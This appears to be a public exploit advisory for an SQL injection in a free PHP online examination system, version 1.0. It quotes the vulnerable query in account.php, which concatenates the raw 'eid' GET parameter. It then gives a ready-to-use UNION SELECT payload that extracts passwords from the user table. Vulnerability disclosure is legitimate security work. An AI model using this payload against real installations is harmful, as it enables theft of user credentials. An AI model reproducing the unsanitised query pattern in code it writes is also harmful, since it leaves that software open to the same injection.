# Exploit Title: Online Examination System - SQL Injection
# Google Dork: N/A
# Date: 2022-9-28
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

Vulnerability Details
======================

Steps :

vulnerable code in file account.php

<?php
if(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {
$eid=@$_GET['eid'];
$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );
echo '<div class="panel" style="margin:5%">';
while($row=mysqli_fetch_array($q) )
?>

1) Log in to the application after register new user

inject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--